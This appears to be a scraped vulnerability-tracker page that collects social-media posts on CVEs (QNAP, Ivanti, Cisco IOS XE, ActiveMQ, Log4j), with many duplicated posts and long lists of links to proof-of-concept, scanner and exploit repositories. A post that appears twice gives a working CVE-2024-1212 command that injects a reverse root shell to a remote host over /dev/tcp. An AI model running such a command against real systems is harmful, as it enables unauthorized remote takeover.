2 posts
QNAP security advisory: Multiple Vulnerabilities in QTS, QuTS hero, QuTScloud, myQNAPcloud, and myQNAPcloud Link (PWN2OWN 2023)
QNAP added 3 additional CVEs to a 09 March 2024 advisory: CVE-2024-27124, CVE-2024-32764 and CVE-2024-32766. QNAP hid the CVSSv3 scores, which isn't surprising given how disgustingly severe they were. No mention of exploitation.
#QNAP #vulnerability #CVE_2024_27124 #CVE_2024_32764 #CVE_2024_32766
##QNAP security advisory: Multiple Vulnerabilities in QTS, QuTS hero, QuTScloud, myQNAPcloud, and myQNAPcloud Link (PWN2OWN 2023)
QNAP added 3 additional CVEs to a 09 March 2024 advisory: CVE-2024-27124, CVE-2024-32764 and CVE-2024-32766. QNAP hid the CVSSv3 scores, which isn't surprising given how disgustingly severe they were. No mention of exploitation.
#QNAP #vulnerability #CVE_2024_27124 #CVE_2024_32764 #CVE_2024_32766
##updated 2024-03-07T13:52:27.110000
2 posts
CISA: CISA and FBI Release Secure by Design Alert to Urge Manufacturers to Eliminate Directory Traversal Vulnerabilities
CISA and FBI released a joint Secure by Design Alert, Eliminating Directory Traversal Vulnerabilities in Software (PDF). This Alert was crafted in response to recent well-publicized threat actor campaigns that exploited directory traversal vulnerabilities in software (e.g., CVE-2024-1708, CVE-2024-20345) to compromise users of the software—impacting critical infrastructure sectors, including the Healthcare and Public Health Sector. Additionally, this Alert highlights the prevalence, and continued threat actor exploitation of, directory traversal defects. Currently, CISA has listed 55 directory traversal vulnerabilities in the Known Exploited Vulnerabilities (KEV) Catalog.
#CISA #FBI #pathtraversal #securebydesign #CVE_2024_1708 #CVE_2024_20345 #threatintel
##CISA: CISA and FBI Release Secure by Design Alert to Urge Manufacturers to Eliminate Directory Traversal Vulnerabilities
CISA and FBI released a joint Secure by Design Alert, Eliminating Directory Traversal Vulnerabilities in Software (PDF). This Alert was crafted in response to recent well-publicized threat actor campaigns that exploited directory traversal vulnerabilities in software (e.g., CVE-2024-1708, CVE-2024-20345) to compromise users of the software—impacting critical infrastructure sectors, including the Healthcare and Public Health Sector. Additionally, this Alert highlights the prevalence, and continued threat actor exploitation of, directory traversal defects. Currently, CISA has listed 55 directory traversal vulnerabilities in the Known Exploited Vulnerabilities (KEV) Catalog.
#CISA #FBI #pathtraversal #securebydesign #CVE_2024_1708 #CVE_2024_20345 #threatintel
##updated 2024-02-22T15:30:39
2 posts
2 repos
CISA: CISA and FBI Release Secure by Design Alert to Urge Manufacturers to Eliminate Directory Traversal Vulnerabilities
CISA and FBI released a joint Secure by Design Alert, Eliminating Directory Traversal Vulnerabilities in Software (PDF). This Alert was crafted in response to recent well-publicized threat actor campaigns that exploited directory traversal vulnerabilities in software (e.g., CVE-2024-1708, CVE-2024-20345) to compromise users of the software—impacting critical infrastructure sectors, including the Healthcare and Public Health Sector. Additionally, this Alert highlights the prevalence, and continued threat actor exploitation of, directory traversal defects. Currently, CISA has listed 55 directory traversal vulnerabilities in the Known Exploited Vulnerabilities (KEV) Catalog.
#CISA #FBI #pathtraversal #securebydesign #CVE_2024_1708 #CVE_2024_20345 #threatintel
##CISA: CISA and FBI Release Secure by Design Alert to Urge Manufacturers to Eliminate Directory Traversal Vulnerabilities
CISA and FBI released a joint Secure by Design Alert, Eliminating Directory Traversal Vulnerabilities in Software (PDF). This Alert was crafted in response to recent well-publicized threat actor campaigns that exploited directory traversal vulnerabilities in software (e.g., CVE-2024-1708, CVE-2024-20345) to compromise users of the software—impacting critical infrastructure sectors, including the Healthcare and Public Health Sector. Additionally, this Alert highlights the prevalence, and continued threat actor exploitation of, directory traversal defects. Currently, CISA has listed 55 directory traversal vulnerabilities in the Known Exploited Vulnerabilities (KEV) Catalog.
#CISA #FBI #pathtraversal #securebydesign #CVE_2024_1708 #CVE_2024_20345 #threatintel
##updated 2024-02-21T18:31:06
4 posts
1 repos
Hi there! You look like someone who appreciates the finer things in #ethicalhacking. 🥨 Snack on these fresh updates which include:
💥 New findings for publicly exposed VNC, MSSQL & LDAP services + comprehensive DNS records
👀 Detectors for CVE-2023-3824 (CVSSv3 9.8) & CVE-2023-44487 (CVSSv3 7.5)
🎯 Exploits for CVE-2024-0204 (CVSSv3 9.8) & CVE-2024-1212 (CVSSv3 10)
🥊 Detection for flaws in JWT implementations which lead to authentication security risks
🕷️ Extra information about spidered responses in Website Scanner evidence
🔥 Proof of exploitation for Linux OS command injection from the Website Scanner
and MORE!
Check out the video: https://youtu.be/-CZJhZvErsI?si=l-TOzCIzs-nsAx_z
Or the change log: https://pentest-tools.com/change-log
##CVE-2024-1212 reverse root shell:
curl -kv "https://192.168.56.4/access/set?param=enableapi&value=1" -u "';ssh -oProxyCommand=';sh&>/dev/tcp/192.168.56.1/4444<&1' vulncheck.com #:"
Hi there! You look like someone who appreciates the finer things in #ethicalhacking. 🥨 Snack on these fresh updates which include:
💥 New findings for publicly exposed VNC, MSSQL & LDAP services + comprehensive DNS records
👀 Detectors for CVE-2023-3824 (CVSSv3 9.8) & CVE-2023-44487 (CVSSv3 7.5)
🎯 Exploits for CVE-2024-0204 (CVSSv3 9.8) & CVE-2024-1212 (CVSSv3 10)
🥊 Detection for flaws in JWT implementations which lead to authentication security risks
🕷️ Extra information about spidered responses in Website Scanner evidence
🔥 Proof of exploitation for Linux OS command injection from the Website Scanner
and MORE!
Check out the video: https://youtu.be/-CZJhZvErsI?si=l-TOzCIzs-nsAx_z
Or the change log: https://pentest-tools.com/change-log
##CVE-2024-1212 reverse root shell:
curl -kv "https://192.168.56.4/access/set?param=enableapi&value=1" -u "';ssh -oProxyCommand=';sh&>/dev/tcp/192.168.56.1/4444<&1' vulncheck.com #:"
updated 2024-02-15T18:40:48.837000
2 posts
1 repos
Good haul this week, including #exploit modules for PAN-OS CVE-2024-3400, FortiClient CVE-2023-48788, and Apache Solr CVE-2023-50386. Some solid fixes and enhancements too! 🐚 https://www.rapid7.com/blog/post/2024/04/26/metasploit-weekly-wrap-up-04-26-24/
##Good haul this week, including #exploit modules for PAN-OS CVE-2024-3400, FortiClient CVE-2023-48788, and Apache Solr CVE-2023-50386. Some solid fixes and enhancements too! 🐚 https://www.rapid7.com/blog/post/2024/04/26/metasploit-weekly-wrap-up-04-26-24/
##updated 2024-02-09T05:11:32
2 posts
4 repos
https://github.com/h4x0r-dz/CVE-2024-21893.py
https://github.com/Chocapikk/CVE-2024-21893-to-CVE-2024-21887
@nf3xn While MITRE seems like a small fry, Forbes probably explained it best: Inside America's Secretive $2 Billion Research Hub: Collecting Fingerprints from Facebook, Hacking Smartwatches, and Fighting Covid-19 (13 July 2020)
MITRE was one of several targets. To show how dangerous and how massively exploited Ivanti was to the U.S. Government, the CVE-2024-21893 (Ivanti Connect Secure/Policy Secure/Neurons Server-Side Request Forgery (SSRF) Vulnerability) was added to the Known Exploited Vulnerabilities Catalog 31 January 2024 with a due date of 02 February 2024, two days later. For reference, most KEV entries have 2-3 weeks to remediate.
Fun fact, CISA announced a second set of CVEs to the KEV Catalog on 10 January and 31 January 2024... both times for Ivanti's actively exploited zero-days. I don't recall CISA ever adding additional KEV entries instead of just waiting until the next day.
##@nf3xn While MITRE seems like a small fry, Forbes probably explained it best: Inside America's Secretive $2 Billion Research Hub: Collecting Fingerprints from Facebook, Hacking Smartwatches, and Fighting Covid-19 (13 July 2020)
MITRE was one of several targets. To show how dangerous and how massively exploited Ivanti was to the U.S. Government, the CVE-2024-21893 (Ivanti Connect Secure/Policy Secure/Neurons Server-Side Request Forgery (SSRF) Vulnerability) was added to the Known Exploited Vulnerabilities Catalog 31 January 2024 with a due date of 02 February 2024, two days later. For reference, most KEV entries have 2-3 weeks to remediate.
Fun fact, CISA announced a second set of CVEs to the KEV Catalog on 10 January and 31 January 2024... both times for Ivanti's actively exploited zero-days. I don't recall CISA ever adding additional KEV entries instead of just waiting until the next day.
##updated 2024-02-03T05:07:29
2 posts
28 repos
https://github.com/IceBreakerCode/CVE-2023-20198
https://github.com/Shadow0ps/CVE-2023-20198-Scanner
https://github.com/alekos3/CVE_2023_20198_Detector
https://github.com/sohaibeb/CVE-2023-20198
https://github.com/codeb0ss/CVE-2023-20198-PoC
https://github.com/RevoltSecurities/CVE-2023-20198
https://github.com/ohlawd/CVE-2023-20198
https://github.com/netbell/CVE-2023-20198-Fix
https://github.com/alekos3/CVE_2023_20198_Remediator
https://github.com/emomeni/Simple-Ansible-for-CVE-2023-20198
https://github.com/mr-r3b00t/CVE-2023-20198-IOS-XE-Scanner
https://github.com/JoyGhoshs/CVE-2023-20198
https://github.com/kacem-expereo/CVE-2023-20198
https://github.com/Atea-Redteam/CVE-2023-20198
https://github.com/Pushkarup/CVE-2023-20198
https://github.com/securityphoenix/cisco-CVE-2023-20198-tester
https://github.com/smokeintheshell/CVE-2023-20198
https://github.com/raystr-atearedteam/CVE-2023-20198-checker
https://github.com/Vulnmachines/Cisco_CVE-2023-20198
https://github.com/vulncheck-oss/cisco-ios-xe-implant-scanner
https://github.com/hackingyseguridad/nmap
https://github.com/iveresk/cve-2023-20198
https://github.com/fox-it/cisco-ios-xe-implant-detection
https://github.com/ZephrFish/CVE-2023-20198-Checker
https://github.com/W01fh4cker/CVE-2023-20198-RCE
https://github.com/Tounsi007/CVE-2023-20198
🚨EXPLOIT POC🚨PoC for CVE-2023-20198 Cisco IOS XE RCE and query released by @W01fh4cker.
#Clearnet #DarkWebInformer #DarkWeb #Exploit #Cyberattack #Cybercrime #Cisco #Infosec #CTI #CVE202320198 #Vulnerability
GitHub: https://github.com/W01fh4cker/CVE-2023-20198-RCE
X Link: https://twitter.com/DarkWebInformer/status/1784360877132525857
##🚨EXPLOIT POC🚨PoC for CVE-2023-20198 Cisco IOS XE RCE and query released by @W01fh4cker.
#Clearnet #DarkWebInformer #DarkWeb #Exploit #Cyberattack #Cybercrime #Cisco #Infosec #CTI #CVE202320198 #Vulnerability
GitHub: https://github.com/W01fh4cker/CVE-2023-20198-RCE
X Link: https://twitter.com/DarkWebInformer/status/1784360877132525857
##updated 2024-02-02T18:30:29
2 posts
6 repos
https://github.com/adminlove520/CVE-2024-0204
https://github.com/cbeek-r7/CVE-2024-0204
https://github.com/gobysec/GobyVuls
https://github.com/horizon3ai/CVE-2024-0204
Hi there! You look like someone who appreciates the finer things in #ethicalhacking. 🥨 Snack on these fresh updates which include:
💥 New findings for publicly exposed VNC, MSSQL & LDAP services + comprehensive DNS records
👀 Detectors for CVE-2023-3824 (CVSSv3 9.8) & CVE-2023-44487 (CVSSv3 7.5)
🎯 Exploits for CVE-2024-0204 (CVSSv3 9.8) & CVE-2024-1212 (CVSSv3 10)
🥊 Detection for flaws in JWT implementations which lead to authentication security risks
🕷️ Extra information about spidered responses in Website Scanner evidence
🔥 Proof of exploitation for Linux OS command injection from the Website Scanner
and MORE!
Check out the video: https://youtu.be/-CZJhZvErsI?si=l-TOzCIzs-nsAx_z
Or the change log: https://pentest-tools.com/change-log
##Hi there! You look like someone who appreciates the finer things in #ethicalhacking. 🥨 Snack on these fresh updates which include:
💥 New findings for publicly exposed VNC, MSSQL & LDAP services + comprehensive DNS records
👀 Detectors for CVE-2023-3824 (CVSSv3 9.8) & CVE-2023-44487 (CVSSv3 7.5)
🎯 Exploits for CVE-2024-0204 (CVSSv3 9.8) & CVE-2024-1212 (CVSSv3 10)
🥊 Detection for flaws in JWT implementations which lead to authentication security risks
🕷️ Extra information about spidered responses in Website Scanner evidence
🔥 Proof of exploitation for Linux OS command injection from the Website Scanner
and MORE!
Check out the video: https://youtu.be/-CZJhZvErsI?si=l-TOzCIzs-nsAx_z
Or the change log: https://pentest-tools.com/change-log
##updated 2024-01-22T17:15:09.523000
2 posts
12 repos
https://github.com/gobysec/GobyVuls
https://github.com/yoryio/CVE-2023-46805
https://github.com/imhunterand/CVE-2024-21887
https://github.com/raminkarimkhani1996/CVE-2023-46805_CVE-2024-21887
https://github.com/Chocapikk/CVE-2024-21887
https://github.com/tucommenceapousser/CVE-2024-21887
https://github.com/mickdec/CVE-2023-46805_CVE-2024-21887_scan_grouped
https://github.com/Chocapikk/CVE-2024-21893-to-CVE-2024-21887
https://github.com/gobysec/Goby
https://github.com/seajaysec/Ivanti-Connect-Around-Scan
MITRE: Technical Deep Dive: Understanding the Anatomy of a Cyber Intrusion
Two weeks ago, MITRE announced that they were breached by a nation-state actor. BLUF is that the indicators overlap with Mandiant's UNC5221, a "China-nexus espionage threat actor". MITRE provides technical details of the intrusion, including timeline, a newly identified BEEFLUSH web shell, more details on BUSHWALK web shell, and the threat actor’s tactics, techniques, and procedures. The IOC are broken up into several sections. And it wouldn't be MITRE without mapping out the ATT&CK TTPs!
#UNC5221 #MITRE #DFIR #threatintel #IOC #Ivanti #ConnectSecure #CVE_2023_46805 #CVE_2024_21887 #cyberespionage #MITREATTACK
##MITRE: Technical Deep Dive: Understanding the Anatomy of a Cyber Intrusion
Two weeks ago, MITRE announced that they were breached by a nation-state actor. BLUF is that the indicators overlap with Mandiant's UNC5221, a "China-nexus espionage threat actor". MITRE provides technical details of the intrusion, including timeline, a newly identified BEEFLUSH web shell, more details on BUSHWALK web shell, and the threat actor’s tactics, techniques, and procedures. The IOC are broken up into several sections. And it wouldn't be MITRE without mapping out the ATT&CK TTPs!
#UNC5221 #MITRE #DFIR #threatintel #IOC #Ivanti #ConnectSecure #CVE_2023_46805 #CVE_2024_21887 #cyberespionage #MITREATTACK
##updated 2024-01-22T17:15:09.080000
2 posts
8 repos
https://github.com/yoryio/CVE-2023-46805
https://github.com/w2xim3/CVE-2023-46805
https://github.com/raminkarimkhani1996/CVE-2023-46805_CVE-2024-21887
https://github.com/mickdec/CVE-2023-46805_CVE-2024-21887_scan_grouped
https://github.com/cbeek-r7/CVE-2023-46805
https://github.com/seajaysec/Ivanti-Connect-Around-Scan
MITRE: Technical Deep Dive: Understanding the Anatomy of a Cyber Intrusion
Two weeks ago, MITRE announced that they were breached by a nation-state actor. BLUF is that the indicators overlap with Mandiant's UNC5221, a "China-nexus espionage threat actor". MITRE provides technical details of the intrusion, including timeline, a newly identified BEEFLUSH web shell, more details on BUSHWALK web shell, and the threat actor’s tactics, techniques, and procedures. The IOC are broken up into several sections. And it wouldn't be MITRE without mapping out the ATT&CK TTPs!
#UNC5221 #MITRE #DFIR #threatintel #IOC #Ivanti #ConnectSecure #CVE_2023_46805 #CVE_2024_21887 #cyberespionage #MITREATTACK
##MITRE: Technical Deep Dive: Understanding the Anatomy of a Cyber Intrusion
Two weeks ago, MITRE announced that they were breached by a nation-state actor. BLUF is that the indicators overlap with Mandiant's UNC5221, a "China-nexus espionage threat actor". MITRE provides technical details of the intrusion, including timeline, a newly identified BEEFLUSH web shell, more details on BUSHWALK web shell, and the threat actor’s tactics, techniques, and procedures. The IOC are broken up into several sections. And it wouldn't be MITRE without mapping out the ATT&CK TTPs!
#UNC5221 #MITRE #DFIR #threatintel #IOC #Ivanti #ConnectSecure #CVE_2023_46805 #CVE_2024_21887 #cyberespionage #MITREATTACK
##updated 2023-12-29T20:15:55.393000
2 posts
An elevation of privilege vulnerability exists in Microsoft Windows when Folder redirection has been enabled via Group Policy. When folder redirection file server is co-located with Terminal server, an attacker who successfully exploited the vulnerability would be able to begin redirecting another user's personal data to a created folder.
To exploit the vulnerability, an attacker can cre
Group Policy Folder Redirection CVE-2021-26887
Two years ago (march 2020), I found this sort of “vulnerability” in Folder Redirection policy and reported it to MSRC. They acknowledged it with...
🔗️ [Decoder] https://link.is.it/bp55iz
##Group Policy Folder Redirection CVE-2021-26887
Two years ago (march 2020), I found this sort of “vulnerability” in Folder Redirection policy and reported it to MSRC. They acknowledged it with...
🔗️ [Decoder] https://link.is.it/bp55iz
##updated 2023-12-19T15:30:29
2 posts
@cR0w @reverseics There's an timeless argument of whether or not hardcoded default credentials is a vulnerability worth of a CVE.
A search in CISA's KEV Catalog shows CVE-2024-3272, CVE-2022-26138, CVE-2020-29583, CVE-2020-8657 of various products have the title ending in "Use of Hard-Coded Credentials Vulnerability." CVE-2023-6448 is the only one for "default password vulnerability."
##@cR0w @reverseics There's an timeless argument of whether or not hardcoded default credentials is a vulnerability worth of a CVE.
A search in CISA's KEV Catalog shows CVE-2024-3272, CVE-2022-26138, CVE-2020-29583, CVE-2020-8657 of various products have the title ending in "Use of Hard-Coded Credentials Vulnerability." CVE-2023-6448 is the only one for "default password vulnerability."
##updated 2023-12-08T05:05:23
2 posts
This was reported last year by Arctic Wolf as Cactus Ransomware was actively exploiting Qlik Sense servers for initial access. The vulnerabilities are as follows:
Project Melissa, a public-private partnership against ransomware, identified 3100 vulnerable servers worldwide and notified their organizations. 122 of these servers were actively being exploited.
#Cactus #ransomware #CVE_2023_41266 #CVE_2023_41265 #CVE_2023_48365 #Qlik #vulnerability #threatintel
##Cactus Ransomware Exploits Qlik Vulnerabilities for Initial Access Mega Toot
This was reported last year by Arctic Wolf as Cactus Ransomware was actively exploiting Qlik Sense servers for initial access. The vulnerabilities are as follows:
Project Melissa, a public-private partnership against ransomware, identified 3100 vulnerable servers worldwide and notified their organizations. 122 of these servers were actively being exploited.
#Cactus #ransomware #CVE_2023_41266 #CVE_2023_41265 #CVE_2023_48365 #Qlik #vulnerability #threatintel
##updated 2023-12-06T02:15:07.187000
5 posts
SANS ISC: Another Day, Another NAS: Attacks against Zyxel NAS326 devices CVE-2023-4473, CVE-2023-4474
@jullrich of SANS ISC warns of 89.190.156.248
scanning for and attempting to exploit Zyxel NAS326 vulnerabilities CVE-2023-4473 and CVE-2023-4474 (both 9.8 critical, disclosed 29 November 2023) to download and execute the "amanas2" binary and execute it.
#threatintel #CVE_2023_4473 #CVE_2023_4474 #activeexploitation #eitw #Zyxel #vulnerability #IOC
##SANS ISC: Another Day, Another NAS: Attacks against Zyxel NAS326 devices CVE-2023-4473, CVE-2023-4474
@jullrich of SANS ISC warns of 89.190.156.248
scanning for and attempting to exploit Zyxel NAS326 vulnerabilities CVE-2023-4473 and CVE-2023-4474 (both 9.8 critical, disclosed 29 November 2023) to download and execute the "amanas2" binary and execute it.
#threatintel #CVE_2023_4473 #CVE_2023_4474 #activeexploitation #eitw #Zyxel #vulnerability #IOC
##Another Day, Another NAS: Attacks against Zyxel NAS326 devices CVE-2023-4473, CVE-2023-4474
#CVE-2023-4473 #CVE-2023-4474
https://isc.sans.edu/diary/rss/30884
Another Day, Another NAS: Attacks against #Zyxel #NAS326 devices CVE-2023-4473, CVE-2023-4474 https://i5c.us/d30884
##Another Day, Another NAS: Attacks against #Zyxel #NAS326 devices CVE-2023-4473, CVE-2023-4474 https://i5c.us/d30884
##updated 2023-12-06T02:15:07.063000
5 posts
SANS ISC: Another Day, Another NAS: Attacks against Zyxel NAS326 devices CVE-2023-4473, CVE-2023-4474
@jullrich of SANS ISC warns of 89.190.156.248
scanning for and attempting to exploit Zyxel NAS326 vulnerabilities CVE-2023-4473 and CVE-2023-4474 (both 9.8 critical, disclosed 29 November 2023) to download and execute the "amanas2" binary and execute it.
#threatintel #CVE_2023_4473 #CVE_2023_4474 #activeexploitation #eitw #Zyxel #vulnerability #IOC
##SANS ISC: Another Day, Another NAS: Attacks against Zyxel NAS326 devices CVE-2023-4473, CVE-2023-4474
@jullrich of SANS ISC warns of 89.190.156.248
scanning for and attempting to exploit Zyxel NAS326 vulnerabilities CVE-2023-4473 and CVE-2023-4474 (both 9.8 critical, disclosed 29 November 2023) to download and execute the "amanas2" binary and execute it.
#threatintel #CVE_2023_4473 #CVE_2023_4474 #activeexploitation #eitw #Zyxel #vulnerability #IOC
##Another Day, Another NAS: Attacks against Zyxel NAS326 devices CVE-2023-4473, CVE-2023-4474
#CVE-2023-4473 #CVE-2023-4474
https://isc.sans.edu/diary/rss/30884
Another Day, Another NAS: Attacks against #Zyxel #NAS326 devices CVE-2023-4473, CVE-2023-4474 https://i5c.us/d30884
##Another Day, Another NAS: Attacks against #Zyxel #NAS326 devices CVE-2023-4473, CVE-2023-4474 https://i5c.us/d30884
##updated 2023-11-28T22:24:39
2 posts
26 repos
https://github.com/vulncheck-oss/cve-2023-46604
https://github.com/NKeshawarz/CVE-2023-46604-RCE
https://github.com/dcm2406/CVE-2023-46604
https://github.com/evkl1d/CVE-2023-46604
https://github.com/duck-sec/CVE-2023-46604-ActiveMQ-RCE-pseudoshell
https://github.com/SaumyajeetDas/CVE-2023-46604-RCE-Reverse-Shell-Apache-ActiveMQ
https://github.com/Arlenhiack/ActiveMQ-RCE-Exploit
https://github.com/vjayant93/CVE-2023-46604-POC
https://github.com/Mudoleto/Broker_ApacheMQ
https://github.com/minhangxiaohui/ActiveMQ_CVE-2023-46604
https://github.com/mrpentst/CVE-2023-46604
https://github.com/Anekant-Singhai/Exploits
https://github.com/h3x3h0g/ActiveMQ-RCE-CVE-2023-46604-Write-up
https://github.com/JaneMandy/ActiveMQ_RCE_Pro_Max
https://github.com/nitzanoligo/CVE-2023-46604-demo
https://github.com/justdoit-cai/CVE-2023-46604-Apache-ActiveMQ-RCE-exp
https://github.com/dcm2406/CVE-Lab
https://github.com/thinkycx/activemq-rce-cve-2023-46604
https://github.com/LiritoShawshark/CVE-2023-46604_ActiveMQ_RCE_Recurrence
https://github.com/sule01u/CVE-2023-46604
https://github.com/hh-hunter/cve-2023-46604
https://github.com/trganda/ActiveMQ-RCE
https://github.com/X1r0z/ActiveMQ-RCE
https://github.com/ph-hitachi/CVE-2023-46604
https://github.com/tomasmussi-mulesoft/activemq-cve-2023-46604
Apache ActiveMQ security advisory: CVE-2024-32114 - Jolokia and REST API were not secured with default configuration
CVE-2024-32114 (8.5 high) Insecure Default Initialization of Resource (Jolokia JMX REST API and the Message REST API). A malicious actor could interact with the broker using Jolokia JMX REST API, or produce/consume messages or purge/delete destinations using the Message REST API. The impact of CVE-2024-32114 is unauthorized data access, data loss, or service disruption, severely compromising the application’s integrity and availability. Fixed in Apache ActiveMQ 6.1.2. Mitigation is to update the default conf/jetty.xml configuration file to add authentication requirement (see advisory for details)
See SOCRadar blog post New High-Severity Vulnerability in Apache ActiveMQ Poses Risk of Unauthorized Access: CVE-2024-32114
Why you should care about CVE-2024-32114:
A previous Apache ActiveMQ vulnerability CVE-2023-46604 (rated 10.0 maximum severity, disclosed 27 October 2023 by Apache) was exploited almost immediately and added to CISA's KEV Catalog on 02 November 2024 (within 5 days). It is known to be exploited by ransomware groups.
Apache ActiveMQ security advisory: CVE-2024-32114 - Jolokia and REST API were not secured with default configuration
CVE-2024-32114 (8.5 high) Insecure Default Initialization of Resource (Jolokia JMX REST API and the Message REST API). A malicious actor could interact with the broker using Jolokia JMX REST API, or produce/consume messages or purge/delete destinations using the Message REST API. The impact of CVE-2024-32114 is unauthorized data access, data loss, or service disruption, severely compromising the application’s integrity and availability. Fixed in Apache ActiveMQ 6.1.2. Mitigation is to update the default conf/jetty.xml configuration file to add authentication requirement (see advisory for details)
See SOCRadar blog post New High-Severity Vulnerability in Apache ActiveMQ Poses Risk of Unauthorized Access: CVE-2024-32114
Why you should care about CVE-2024-32114:
A previous Apache ActiveMQ vulnerability CVE-2023-46604 (rated 10.0 maximum severity, disclosed 27 October 2023 by Apache) was exploited almost immediately and added to CISA's KEV Catalog on 02 November 2024 (within 5 days). It is known to be exploited by ransomware groups.
updated 2023-11-20T18:04:21.453000
2 posts
SafeBreach revealed that the DOS-to-NT path conversion process could be exploited by threat actors to achieve rootkit-like capabilities to conceal and impersonate files, directories, and processes. "During this conversion process, a known issue exists in which the function removes trailing dots (referring to this as "MagicDot") from any path element and any trailing spaces from the last path element. This action is completed by most user-space APIs in Windows." This resulted in multiple CVEs: CVE-2023-36396 (7.8 high, RCE), CVE-2023-32054 (7.3 high, EoP write), and CVE-2023-42757 (unpublished DoS). Microsoft declined to fix an Elevation of Privilege delete vulnerability. 🔗 https://www.safebreach.com/blog/magicdot-a-hackers-magic-show-of-disappearing-dots-and-spaces/
##SafeBreach revealed that the DOS-to-NT path conversion process could be exploited by threat actors to achieve rootkit-like capabilities to conceal and impersonate files, directories, and processes. "During this conversion process, a known issue exists in which the function removes trailing dots (referring to this as "MagicDot") from any path element and any trailing spaces from the last path element. This action is completed by most user-space APIs in Windows." This resulted in multiple CVEs: CVE-2023-36396 (7.8 high, RCE), CVE-2023-32054 (7.3 high, EoP write), and CVE-2023-42757 (unpublished DoS). Microsoft declined to fix an Elevation of Privilege delete vulnerability. 🔗 https://www.safebreach.com/blog/magicdot-a-hackers-magic-show-of-disappearing-dots-and-spaces/
##updated 2023-11-07T03:39:36.897000
2 posts
100 repos
https://github.com/logpresso/CVE-2021-44228-Scanner
https://github.com/yahoo/check-log4j
https://github.com/momos1337/Log4j-RCE
https://github.com/julian911015/Log4j-Scanner-Exploit
https://github.com/christophetd/log4shell-vulnerable-app
https://github.com/corretto/hotpatch-for-apache-log4j2
https://github.com/dtact/divd-2021-00038--log4j-scanner
https://github.com/mufeedvh/log4jail
https://github.com/irgoncalves/f5-waf-quick-patch-cve-2021-44228
https://github.com/sassoftware/loguccino
https://github.com/NS-Sp4ce/Vm4J
https://github.com/simonis/Log4jPatch
https://github.com/fireeye/CVE-2021-44228
https://github.com/LiveOverflow/log4shell
https://github.com/infiniroot/nginx-mitigate-log4shell
https://github.com/BinaryDefense/log4j-honeypot-flask
https://github.com/twseptian/spring-boot-log4j-cve-2021-44228-docker-lab
https://github.com/puzzlepeaches/Log4jUnifi
https://github.com/Diverto/nse-log4shell
https://github.com/takito1812/log4j-detect
https://github.com/corelight/cve-2021-44228
https://github.com/CrackerCat/CVE-2021-44228-Log4j-Payloads
https://github.com/HynekPetrak/log4shell-finder
https://github.com/CreeperHost/Log4jPatcher
https://github.com/aws-samples/kubernetes-log4j-cve-2021-44228-node-agent
https://github.com/Jeromeyoung/log4j2burpscanner
https://github.com/greymd/CVE-2021-44228
https://github.com/qingtengyun/cve-2021-44228-qingteng-online-patch
https://github.com/Adikso/minecraft-log4j-honeypot
https://github.com/CERTCC/CVE-2021-44228_scanner
https://github.com/Nanitor/log4fix
https://github.com/Puliczek/CVE-2021-44228-PoC-log4j-bypass-words
https://github.com/pedrohavay/exploit-CVE-2021-44228
https://github.com/TaroballzChen/CVE-2021-44228-log4jVulnScanner-metasploit
https://github.com/darkarnium/Log4j-CVE-Detect
https://github.com/shamo0/CVE-2021-44228
https://github.com/RedDrip7/Log4Shell_CVE-2021-44228_related_attacks_IOCs
https://github.com/alexbakker/log4shell-tools
https://github.com/CodeShield-Security/Log4JShell-Bytecode-Detector
https://github.com/stripe/log4j-remediation-tools
https://github.com/toramanemre/log4j-rce-detect-waf-bypass
https://github.com/wortell/log4j
https://github.com/bigsizeme/Log4j-check
https://github.com/puzzlepeaches/Log4jHorizon
https://github.com/0xInfection/LogMePwn
https://github.com/alexandre-lavoie/python-log4rce
https://github.com/kubearmor/log4j-CVE-2021-44228
https://github.com/fullhunt/log4j-scan
https://github.com/cisagov/log4j-scanner
https://github.com/HyCraftHD/Log4J-RCE-Proof-Of-Concept
https://github.com/f0ng/log4j2burpscanner
https://github.com/boundaryx/cloudrasp-log4j2
https://github.com/mzlogin/CVE-2021-44228-Demo
https://github.com/mubix/CVE-2021-44228-Log4Shell-Hashes
https://github.com/Malwar3Ninja/Exploitation-of-Log4j2-CVE-2021-44228
https://github.com/nccgroup/log4j-jndi-be-gone
https://github.com/phoswald/sample-ldap-exploit
https://github.com/KosmX/CVE-2021-44228-example
https://github.com/irgoncalves/f5-waf-enforce-sig-CVE-2021-44228
https://github.com/NorthwaveSecurity/log4jcheck
https://github.com/justakazh/Log4j-CVE-2021-44228
https://github.com/Azeemering/CVE-2021-44228-DFIR-Notes
https://github.com/kozmer/log4j-shell-poc
https://github.com/thomaspatzke/Log4Pot
https://github.com/MalwareTech/Log4jTools
https://github.com/thecyberneh/Log4j-RCE-Exploiter
https://github.com/future-client/CVE-2021-44228
https://github.com/0xst4n/CVE-2021-44228-poc
https://github.com/fox-it/log4j-finder
https://github.com/DragonSurvivalEU/RCE
https://github.com/qingtengyun/cve-2021-44228-qingteng-patch
https://github.com/jas502n/Log4j2-CVE-2021-44228
https://github.com/NCSC-NL/log4shell
https://github.com/mr-vill4in/log4j-fuzzer
https://github.com/lfama/log4j_checker
https://github.com/r3kind1e/Log4Shell-obfuscated-payloads-generator
https://github.com/ssl/scan4log4j
https://github.com/marcourbano/CVE-2021-44228
https://github.com/blake-fm/vcenter-log4j
https://github.com/giterlizzi/nmap-log4shell
https://github.com/mergebase/log4j-detector
https://github.com/nu11secur1ty/CVE-2021-44228-VULN-APP
https://github.com/redhuntlabs/Log4JHunt
https://github.com/rubo77/log4j_checker_beta
https://github.com/dwisiswant0/look4jar
https://github.com/mr-r3b00t/CVE-2021-44228
https://github.com/lucab85/log4j-cve-2021-44228
https://github.com/hackinghippo/log4shell_ioc_ips
https://github.com/tippexs/nginx-njs-waf-cve2021-44228
https://github.com/claranet/ansible-role-log4shell
https://github.com/faisalfs10x/Log4j2-CVE-2021-44228-revshell
https://github.com/puzzlepeaches/Log4jCenter
https://github.com/JagarYousef/log4j-dork-scanner
https://github.com/AlexandreHeroux/Fix-CVE-2021-44228
https://github.com/tangxiaofeng7/CVE-2021-44228-Apache-Log4j-Rce
https://github.com/1lann/log4shelldetect
https://github.com/back2root/log4shell-rex
https://github.com/0xDexter0us/Log4J-Scanner
SonicWall: Vintage Bugs: Data Shows Old Vulnerabilities Still Menace Small Businesses
For small to medium businesses (SMB), SonicWall says that the top five most widespread network attacks used were 3-10 old vulnerabilities. SonicWall suggests that attackers are more likely to take the easiest path to obtain their end goal.
#SMB #cybersecurity #vulnerability #CVE_2021_44228 #CVE_2018_13379 #CVE_2014_0160 #CVE_2021_26085 #CVE_2021_21975
##SonicWall: Vintage Bugs: Data Shows Old Vulnerabilities Still Menace Small Businesses
